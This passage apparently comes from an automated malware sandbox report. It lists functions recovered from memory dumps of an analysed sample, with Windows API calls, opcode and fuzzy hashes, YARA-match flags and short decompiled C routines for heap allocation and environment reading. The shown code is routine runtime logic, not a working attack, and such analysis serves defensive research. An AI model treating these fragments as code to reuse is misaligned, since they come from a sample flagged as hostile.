                        • KiUserExceptionDispatcher.NTDLL ref: 0580A71B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: f7dd164ddf425213af3b3a4339235904b1263da80a015d7414c5d80f08bec416
                        • Instruction ID: 3d97ba69f4432973bb2836064ee2e91ffde5cc6918be62a28e52750778ed3cd2
                        • Opcode Fuzzy Hash: f7dd164ddf425213af3b3a4339235904b1263da80a015d7414c5d80f08bec416
                        • Instruction Fuzzy Hash: 1741E471E01208CBEB58DFA6D9446EEFBB2BF89304F20D12AC815BB294DB355945CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580837F, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580845B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: a8840c6448338b3eb1fbf39ca252c15f45b3d0ec266918a6a4aa6c23f9832947
                        • Instruction ID: 1f5c96bb50aa7bd1c1272e1c1f373224c1881c088a920a33ff996f7c1338409e
                        • Opcode Fuzzy Hash: a8840c6448338b3eb1fbf39ca252c15f45b3d0ec266918a6a4aa6c23f9832947
                        • Instruction Fuzzy Hash: 8241E270E01208CBEB58DFAAD9546EEBBB2BF89304F20D12AC804BB264DB345945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580AEF3, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580AFCB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: c028b747a39233b80292eb444bcdac11a030dda4093b383779047633124d26ed
                        • Instruction ID: 27aed9c77bea6d22bdde17292291af0611b3d7e7d2db2b99433ddf75a067a4fd
                        • Opcode Fuzzy Hash: c028b747a39233b80292eb444bcdac11a030dda4093b383779047633124d26ed
                        • Instruction Fuzzy Hash: 3C41D2B1E01208CBEB58DFAAD9546EEBBB2BF89304F20D52AC814BB254DB355945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580D60B, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580D6E3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 04c1d3b964b8d2b2c211e6def9a3d4d71f834cc3cb55fffed5ed8e5db9ddc425
                        • Instruction ID: d20677460bf55bcb43293038ccdb514541662e047ab8e1ec31e954e0a5f9b5f1
                        • Opcode Fuzzy Hash: 04c1d3b964b8d2b2c211e6def9a3d4d71f834cc3cb55fffed5ed8e5db9ddc425
                        • Instruction Fuzzy Hash: B641F2B1E05208CBEB58DFE6D9546EEFBB2AF88304F24D12AC814BB294DB345945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580DA63, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580DB3B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 68634b656c5e6d3ce3fa7e08661db48700af37694cd700170763dce015136e77
                        • Instruction ID: f0a2650a59dc02c1ec669eb29e005bc4cdee4adeb623919f7104946c7038cf59
                        • Opcode Fuzzy Hash: 68634b656c5e6d3ce3fa7e08661db48700af37694cd700170763dce015136e77
                        • Instruction Fuzzy Hash: 6741C0B1E012088BEB58DFE6D9546EEBBB2AF89304F20D12AC814BB264DB345945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                        0x00401e22
                        0x00401e28

                        APIs
                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                        • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                        • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FD308, Relevance: .4, Instructions: 357COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f42d3d1a5eff987989a7a646575a47e475feabd6ca40300c83a5a0a26806887
                        • Instruction ID: 30475bd9a2a0cea4cd1f1154252254b2227fb58c059344fa61a0e18be84401bc
                        • Opcode Fuzzy Hash: 5f42d3d1a5eff987989a7a646575a47e475feabd6ca40300c83a5a0a26806887
                        • Instruction Fuzzy Hash: D4F1E374E01218CFDB24DFA9C884BDDBBB6BF88304F1085A9D909AB355DB74A985CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FE6E8, Relevance: .3, Instructions: 272COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a69504fd75f44a5a1979bcfcfa722198fd6989d5d9603b7721fb824d7fac7f22
                        • Instruction ID: 21a8d6d4e9d49bdc6dda39de879a89f5127d02527c57b90a8d40b8a8d4d4964d
                        • Opcode Fuzzy Hash: a69504fd75f44a5a1979bcfcfa722198fd6989d5d9603b7721fb824d7fac7f22
                        • Instruction Fuzzy Hash: B6D19274E01218CFDB64DFA5D984B9DBBB2BF89304F1084A9D909A7364DB35AD85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FD9C8, Relevance: .3, Instructions: 272COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8659aa14ab2e60bd38b43ca7540d89b74d5fbce76160755416bb18de2816f5f
                        • Instruction ID: 1ca6bb4720df5f0e605aaaad66055ffe23c0cfbe1298820907f2f12146d93a8b
                        • Opcode Fuzzy Hash: f8659aa14ab2e60bd38b43ca7540d89b74d5fbce76160755416bb18de2816f5f
                        • Instruction Fuzzy Hash: B6D1A074E01218CFDB24DFA5D984B9DBBB2BF89304F1084AAD909A7365DB35AD85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FE28B, Relevance: .3, Instructions: 270COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0663ca8df51f3c2599ea309dbe646010a736f7c74ae108337d6e8e89c41d959d
                        • Instruction ID: 6fb55c05b1fee73103eb20a95d6ac50db0a183574b37a403a21d3c5dfef6d3b0
                        • Opcode Fuzzy Hash: 0663ca8df51f3c2599ea309dbe646010a736f7c74ae108337d6e8e89c41d959d
                        • Instruction Fuzzy Hash: DFC1A274E01218CFDB54DFA5D984B9DBBB2BF89304F2084AAD909A7364DB35AD85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FEB4B, Relevance: .3, Instructions: 270COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 918a8d63c81b935264c6e5759d48a55171bc283b694953f06e5b79d1484e0fbf
                        • Instruction ID: 10804e86902b5647c3b65c2f076700a041fe85d66bc56c6bf6e847df6d035883
                        • Opcode Fuzzy Hash: 918a8d63c81b935264c6e5759d48a55171bc283b694953f06e5b79d1484e0fbf
                        • Instruction Fuzzy Hash: E2C1B274E01218CFDB64DFA5D984B9DBBB2BF89304F1084A9D909A7364DB35AE85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FDE29, Relevance: .3, Instructions: 269COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea1d47445a3c84dea4020b7633a70011c5184bc5f2aad26121fb78abc6af1696
                        • Instruction ID: 6cc1ae167d58f40211251db558b6766ad2f7b78f1ed8cd20022d635eee414dbb
                        • Opcode Fuzzy Hash: ea1d47445a3c84dea4020b7633a70011c5184bc5f2aad26121fb78abc6af1696
                        • Instruction Fuzzy Hash: CCD1A274E01218CFDB14DFA5D984B9DBBB2BF89304F2084A9D909A7365DB359985CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FCE78, Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb75446b25760f3d6fa673c2ec0ad4c9064a96e1a97a9812ebdee39b9d2f5171
                        • Instruction ID: 701726ff166682e5f27d34ed0111ce8ae7f89989287b96f6d491b19580e85885
                        • Opcode Fuzzy Hash: eb75446b25760f3d6fa673c2ec0ad4c9064a96e1a97a9812ebdee39b9d2f5171
                        • Instruction Fuzzy Hash: 40A1F370900208CFDB24DFA9C948BDDBBB5FF89304F20866AD509A73A1DB749985CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FCE68, Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25c92bdd673ccfbbe968c736a8ddf0d12e290b24f67b7c857fd1753e097ffd41
                        • Instruction ID: 8e367883d87041fa2f0d062a82c04e2a564697cb463cac2952976dd374933b1c
                        • Opcode Fuzzy Hash: 25c92bdd673ccfbbe968c736a8ddf0d12e290b24f67b7c857fd1753e097ffd41
                        • Instruction Fuzzy Hash: 69A1F470900208CFDB24DFA9C948BDDBBB5FF89304F20866AD509AB3A1DB749985CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FD1BE, Relevance: .2, Instructions: 202COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3b7fad9302afec41ecb4ac3711130a090caed67834cfadbc2a192de199fb89a
                        • Instruction ID: 8c983116de2c03dd31fa84b40361be4db802838d45c61b3e899ccc77d38c89d0
                        • Opcode Fuzzy Hash: b3b7fad9302afec41ecb4ac3711130a090caed67834cfadbc2a192de199fb89a
                        • Instruction Fuzzy Hash: E391E570900208CFEB20DFA8C948BDDBBB5FF49314F20865AE509A73A1DB75A985CF15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0582F370, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0582F3D0
                        • GetCurrentThread.KERNEL32 ref: 0582F40D
                        • GetCurrentProcess.KERNEL32 ref: 0582F44A
                        • GetCurrentThreadId.KERNEL32 ref: 0582F4A3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 01a61b2bbdf1cf54649896a4cd247ee1f24019414584a35416a2530fb4be4149
                        • Instruction ID: 6393e2373ddd4b789d3624a89e1331ff80cc4d692bcfd406a75a923cf448c719
                        • Opcode Fuzzy Hash: 01a61b2bbdf1cf54649896a4cd247ee1f24019414584a35416a2530fb4be4149
                        • Instruction Fuzzy Hash: 9A5143B0900649CFDB10DFA9D549BDEBFF4BF88314F20885AE519A7250C774A888CF66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                        0x004055c5
                        0x004055cf
                        0x004055d3
                        0x004055e4
                        0x004055e8
                        0x004055ed
                        0x004055f3
                        0x004055f8
                        0x004055fd
                        0x00405602
                        0x00405609
                        0x004055d5
                        0x004055d5
                        0x004055d5
                        0x00405614

                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free
                        • String ID:
                        • API String ID: 3328510275-0
                        • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                        • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                        • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                        • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FA003, Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 047FA0C7
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: bffc7966af87afcd56a03560630c0baf3f46ec7a93fd32a020142ec60b8e8d06
                        • Instruction ID: 9bea7a64473b1dde067de9d5e73e8e6d24cc615c12245db5ae2dd39a56821f98
                        • Opcode Fuzzy Hash: bffc7966af87afcd56a03560630c0baf3f46ec7a93fd32a020142ec60b8e8d06
                        • Instruction Fuzzy Hash: EF51E0748663929FC3046F70E5AC26EBBB9FB5F317B006C46A80AD1261DBBC2954DB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FA010, Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 047FA0C7
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 22903ec2797e53c059ffebd2955c099021f971207f785570f1056c98129cecdf
                        • Instruction ID: e85a11eb96fa8afec8888b040ba087b43f474b1eb702dbe0aba65d802805efd9
                        • Opcode Fuzzy Hash: 22903ec2797e53c059ffebd2955c099021f971207f785570f1056c98129cecdf
                        • Instruction Fuzzy Hash: 9351D074862356DFC3046F74E5AC26EBBB9FB5F317B00AC46A80AD1264DFBC2954DA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05807DF8, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 268aa6ce1d727f58e35b66ddadf55570dde61d53ae5c74eba980f46cc7ef375c
                        • Instruction ID: 0cfeda31c03ef285324c2ffebbf54619a5d376bed1512772ab3dbad3048dea3a
                        • Opcode Fuzzy Hash: 268aa6ce1d727f58e35b66ddadf55570dde61d53ae5c74eba980f46cc7ef375c
                        • Instruction Fuzzy Hash: 9551E3B1D05218DFDB18CFAAD8446DDBBB2FF88314F10D529E815AB294D774A846CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05807F93, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0026757d162eb077263648f69be0d10c26892a4add7451e2fd98d7174f673401
                        • Instruction ID: 18dc71a1c5d98caacefd5d3db4db6ead15a0e01cb946c8b3a78ee77afee374ad
                        • Opcode Fuzzy Hash: 0026757d162eb077263648f69be0d10c26892a4add7451e2fd98d7174f673401
                        • Instruction Fuzzy Hash: 8751E0B4D05208CFDB54CFA9D884ADDBBB2FB48315F20A529E815EB294D774A886CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580824C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b92f75e850a168a105668a55051f21e11ebcb8b69fdfa1512880143733d78847
                        • Instruction ID: 36da391658468c3ca4fc5e0ee045a202c6a91d716871199b24ea26bd19e139fd
                        • Opcode Fuzzy Hash: b92f75e850a168a105668a55051f21e11ebcb8b69fdfa1512880143733d78847
                        • Instruction Fuzzy Hash: FA414A74A08109DFCB44DF98C8849ECF7B6BF48318F24A559D809AB285C731ADC6CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058080A0, Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efe1b3c5b6b15834f7657f0beb409b32c0e3b9af066decf96b88f0f9826f104f
                        • Instruction ID: 0a16f8241eeee953a6fc9db8e1de2911645f394c63c4e2d039139a4ef379f677
                        • Opcode Fuzzy Hash: efe1b3c5b6b15834f7657f0beb409b32c0e3b9af066decf96b88f0f9826f104f
                        • Instruction Fuzzy Hash: AF415970904208DFDB04DF99D984ADDFBB6FF88318F249529D804AB285C771A9C6CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058081EC, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d60f2017ca4e66a477e8860169182e1b30b9792e8574d50faedd0d6761d10f7
                        • Instruction ID: 0153a1ff27940b1d10b89db5fc90d3c46af372e516142527e0c83b7c28fba4a7
                        • Opcode Fuzzy Hash: 0d60f2017ca4e66a477e8860169182e1b30b9792e8574d50faedd0d6761d10f7
                        • Instruction Fuzzy Hash: DF411574A04109DFCB44DF98D884ADCBBB6FF48318F25A559D819A7285C731ADC6CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0582F590, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0582F61F
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 60b992aff9f7aa5283f18566d7198b3cdc72be878faa775ca90bdddf7591d9c5
                        • Instruction ID: 4c64e939c9b603a49c6c9abec36d6d27c405c1bd78620d9fa0cf8e275b2fa6a9
                        • Opcode Fuzzy Hash: 60b992aff9f7aa5283f18566d7198b3cdc72be878faa775ca90bdddf7591d9c5
                        • Instruction Fuzzy Hash: 5D21E0B5900259DFDB10CFA9D984ADEBBF8FF48314F14841AEA14A3350D378A954CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0582F598, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0582F61F
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 61954edf08e8f4c091f7d3a396a1b8e02398f3b789b3dd8263ba1cbf20a8299d
                        • Instruction ID: fa36b5c4cdecb2e49c009b5859a3b31936154df53e585a08c249abdf259c4d06
                        • Opcode Fuzzy Hash: 61954edf08e8f4c091f7d3a396a1b8e02398f3b789b3dd8263ba1cbf20a8299d
                        • Instruction Fuzzy Hash: 9721B3B59002599FDB10CFA9D884ADEFBF8EB48314F14841AE914A7350D378A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                        0x00403e3d
                        0x00403e43
                        0x00403e49
                        0x00403e7b
                        0x00403e80
                        0x00403e86
                        0x00000000
                        0x00403e86
                        0x00403e4d
                        0x00403e4f
                        0x00403e4f
                        0x00403e66
                        0x00403e6f
                        0x00403e77
                        0x00000000
                        0x00000000
                        0x00403e57
                        0x00403e59
                        0x00000000
                        0x00000000
                        0x00403e5c
                        0x00403e61
                        0x00403e62
                        0x00403e64
                        0x00000000
                        0x00000000
                        0x00403e64
                        0x00000000

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                        • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                        • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                        • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020CD514, Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524124337.00000000020CD000.00000040.00000001.sdmp, Offset: 020CD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d03d1fbaa53db2cfc0956799002a4914ad0b4d03fe793121d9d1428176f6e86
                        • Instruction ID: e71ae28f7c0602b2778b2d8a8b4b78b227cd271771e228cbb80e2a9f88a1692e
                        • Opcode Fuzzy Hash: 2d03d1fbaa53db2cfc0956799002a4914ad0b4d03fe793121d9d1428176f6e86
                        • Instruction Fuzzy Hash: 0021F1B1504340EFDB05DF54D9C0B2EBBA5FB88328F34857DE8090A246C336D456EBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020DD030, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524166955.00000000020DD000.00000040.00000001.sdmp, Offset: 020DD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8efcf82df0f0985d3a1b09728bdefad909deb3a3cbaae74deed7bc21d3d10f9
                        • Instruction ID: bd99513bb19c3e2a29529559b15615680c47090aaffafe17719db70c7a0ae175
                        • Opcode Fuzzy Hash: e8efcf82df0f0985d3a1b09728bdefad909deb3a3cbaae74deed7bc21d3d10f9
                        • Instruction Fuzzy Hash: 6521F576504340DFDB15DF50D9C0B26BFA5FBC4314F24C96AE84A4B246C37AD846DB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020DD006, Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524166955.00000000020DD000.00000040.00000001.sdmp, Offset: 020DD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2ac1d14530855be50056e95d9d33125ee9a1a40f39885117114317502661cee
                        • Instruction ID: bb86e5c94d177c3253c436930e3799575eb5623c23075f90762cba61897e742e
                        • Opcode Fuzzy Hash: f2ac1d14530855be50056e95d9d33125ee9a1a40f39885117114317502661cee
                        • Instruction Fuzzy Hash: A3215E754093C09FCB138F24D994B11BFB1EB86214F2985DBD8448B2A7C37A981ADB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020CD50F, Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524124337.00000000020CD000.00000040.00000001.sdmp, Offset: 020CD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83c55ce2c124d4c66a7f5ca439864f6c33354fc61c1cfde54f3d630e4383f744
                        • Instruction ID: 404264e32b4d8dd96437e0e0f15a82de81f38eb80f56e77dfd6ce76c7f9a2bc6
                        • Opcode Fuzzy Hash: 83c55ce2c124d4c66a7f5ca439864f6c33354fc61c1cfde54f3d630e4383f744
                        • Instruction Fuzzy Hash: DF11AFB6404280DFCB12CF14D9C4B1ABFA2FB88324F2486ADD8054B656C33AD55ADBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020CD006, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.524124337.00000000020CD000.00000040.00000001.sdmp, Offset: 020CD000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 19c3ad3812c5758f805922d77b067c8c36bf8493ba8c3a215bb46d8e0c81a0bc
                        • Instruction ID: b7429e05bfff7912af3136033efc807a5e736b315a5dde6b9460340ac36489d7
                        • Opcode Fuzzy Hash: 19c3ad3812c5758f805922d77b067c8c36bf8493ba8c3a215bb46d8e0c81a0bc
